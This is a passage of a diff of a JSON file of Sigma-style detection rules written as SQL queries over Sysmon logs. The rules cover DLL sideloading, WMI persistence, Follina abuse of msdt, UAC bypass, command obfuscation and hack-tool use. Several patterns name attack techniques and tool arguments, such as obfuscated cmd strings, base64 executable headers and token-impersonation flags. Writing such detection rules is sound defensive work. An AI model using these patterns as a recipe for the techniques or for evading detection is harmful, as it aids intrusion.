'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND Image LIKE '%\\\\wldp.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" + "filename": "image_load_side_load_from_non_system_location.yml" }, { - "title": "Suspicious PowerShell Parent Process", - "id": "754ed792-634f-40ae-b3bc-e0448d33f695", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", + "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", "status": "test", - "description": "Detects a suspicious or uncommon parent processes of PowerShell", - "author": "Teymur Kheirkhabarov, Harish Segar", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ - "Other scripts" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%tomcat%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_susp_parent_process.yml" + "filename": "image_load_dcom_iertutil_dll_hijack.yml" }, { - "title": "Disabled Volume Snapshots", - "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", + "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", + "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", "status": "test", - "description": "Detects commands that temporarily turn off Volume Snapshots", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Legitimate administration" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_volsnap_disable.yml" + "filename": "image_load_office_outlook_outlvba_load.yml" }, { - "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", - "id": "5b768e71-86f2-4879-b448-81061cbae951", + "title": "Potential DLL Sideloading Via VMware Xfer", + "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", "status": "experimental", - "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", + "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_default_accounts_manipulation.yml" + "filename": "image_load_side_load_vmware_xfer.yml" }, { - "title": "HackTool - SharpLDAPmonitor Execution", - "id": "9f8fc146-1d1a-4dbf-b8fd-dfae15e08541", + "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", + "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", "status": "experimental", - "description": "Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", + "author": "Greg (rule)", "tags": [ - "attack.discovery" + "attack.defense_evasion", + "attack.t1202", + "cve.2022.30190" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\SharpLDAPmonitor.exe' ESCAPE '\\' OR OriginalFileName = 'SharpLDAPmonitor.exe') OR (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/dcip:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_sharp_ldap_monitor.yml" + "filename": "image_load_dll_sdiageng_load_by_msdt.yml" }, { - "title": "Potential Dosfuscation Activity", - "id": "a77c1610-fc73-4019-8e29-0f51efc04a51", + "title": "Python Py2Exe Image Load", + "id": "cbb56d62-4060-40f7-9466-d8aaf3123f83", "status": "experimental", - "description": "Detects possible payload obfuscation via the commandline", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.", + "author": "Patrick St. John, OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1027.002" ], "falsepositives": [ - "Unknown" + "Legitimate Py2Exe Binaries", + "Known false positive caused with Python Anaconda" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%^^%' ESCAPE '\\' OR CommandLine LIKE '%^|^%' ESCAPE '\\' OR CommandLine LIKE '%,;,%' ESCAPE '\\' OR CommandLine LIKE '%;;;;%' ESCAPE '\\' OR CommandLine LIKE '%;; ;;%' ESCAPE '\\' OR CommandLine LIKE '%(,(,%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC:~%' ESCAPE '\\' OR CommandLine LIKE '% c^m^d%' ESCAPE '\\' OR CommandLine LIKE '%^c^m^d%' ESCAPE '\\' OR CommandLine LIKE '% c^md%' ESCAPE '\\' OR CommandLine LIKE '% cm^d%' ESCAPE '\\' OR CommandLine LIKE '%^cm^d%' ESCAPE '\\' OR CommandLine LIKE '% s^et %' ESCAPE '\\' OR CommandLine LIKE '% s^e^t %' ESCAPE '\\' OR CommandLine LIKE '% se^t %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Description = 'Python Core' AND NOT ((Image LIKE '%Python%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\')) OR (Image = '')))" ], - "filename": "proc_creation_win_cmd_dosfuscation.yml" + "filename": "image_load_susp_python_image_load.yml" }, { - "title": "Base64 MZ Header In CommandLine", - "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", + "title": "Suspicious WSMAN Provider Image Loads", + "id": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", "status": "experimental", - "description": "Detects encoded base64 MZ header in the commandline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((ImageLoaded LIKE '%\\\\WsmSvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WsmAuto.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Microsoft.WSMan.Management.ni.dll' ESCAPE '\\') OR OriginalFileName IN ('WsmSvc.dll', 'WSMANAUTOMATION.DLL', 'Microsoft.WSMan.Management.dll')) OR (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND OriginalFileName = 'WsmWmiPl.dll')) AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%svchost.exe -k netsvcs -p -s BITS%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k NetworkService -p -s Wecsvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\') AND Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\Configure-SMRemoting.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\ServerManager.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine = '')))" ], - "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" + "filename": "image_load_wsman_provider_image_load.yml" }, { - "title": "Console CodePage Lookup Via CHCP", - "id": "7090adee-82e2-4269-bd59-80691e7c6338", - "status": "experimental", - "description": "Detects use of chcp to look up the system locale value as part of host discovery", - "author": "_pete_0, TheDFIRReport", + "title": "WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load", + "id": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", + "status": "test", + "description": "Detects signs of the WMI script host process \"scrcons.exe\" loading scripting DLLs which could indciates WMI ActiveScriptEventConsumers EventConsumers activity.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.discovery", - "attack.t1614.001" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." + "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND Image LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemdisp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshom.ocx' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scrrun.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_chcp_codepage_lookup.yml" + "filename": "image_load_scrcons_wmi_scripteventconsumer.yml" }, { - "title": "HackTool - SharpImpersonation Execution", - "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", - "status": "experimental", - "description": "Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", - "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", + "title": "WMI Persistence - Command Line Event Consumer", + "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "status": "test", + "description": "Detects WMI command line event consumers", + "author": "Thomas Patzke", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1134.001", - "attack.t1134.003" + "attack.t1546.003", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unknown (data set is too small; further testing needed)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_sharp_impersonation.yml" + "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" }, { - "title": "Suspicious Rundll32 Activity Invoking Sys File", - "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", - "status": "test", - "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "title": "DLL Load By System Process From Suspicious Locations", + "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", + "status": "experimental", + "description": "Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location such as C:\\Users\\Public", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1070" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_sys.yml" + "filename": "image_load_susp_dll_load_system_process.yml" }, { - "title": "Group Membership Reconnaissance Via Whoami.EXE", - "id": "bd8b828d-0dca-48e1-8a63-8a58ecf2644f", + "title": "Aruba Network Service Potential DLL Sideloading", + "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", "status": "experimental", - "description": "Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.", + "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /groups%' ESCAPE '\\' OR CommandLine LIKE '% -groups%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_whoami_groups_discovery.yml" + "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" }, { - "title": "TA505 Dropper Load Pattern", - "id": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", - "status": "test", - "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Iviewers.DLL Sideloading", + "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", + "status": "experimental", + "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", + "author": "X__Junior (Nextron Systems)", "tags": [ - "attack.execution", - "attack.g0092", - "attack.t1106" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'mshta.exe'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_ta505_dropper.yml" + "filename": "image_load_side_load_iviewers.yml" }, { - "title": "Renamed Whoami Execution", - "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", - "status": "test", - "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", - "author": "Florian Roth (Nextron Systems)", + "title": "Microsoft Defender Loading DLL from Nondefault Path", + "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", + "status": "experimental", + "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'whoami.exe' AND NOT (Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR Image LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_whoami.yml" + "filename": "image_load_side_load_windows_defender.yml" }, { - "title": "UAC Bypass via ICMLuaUtil", - "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "title": "Hacktool Download", + "id": "19b041f6-e583-40dc-b842-d6fa8011493f", "status": "experimental", - "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", + "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" + "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', 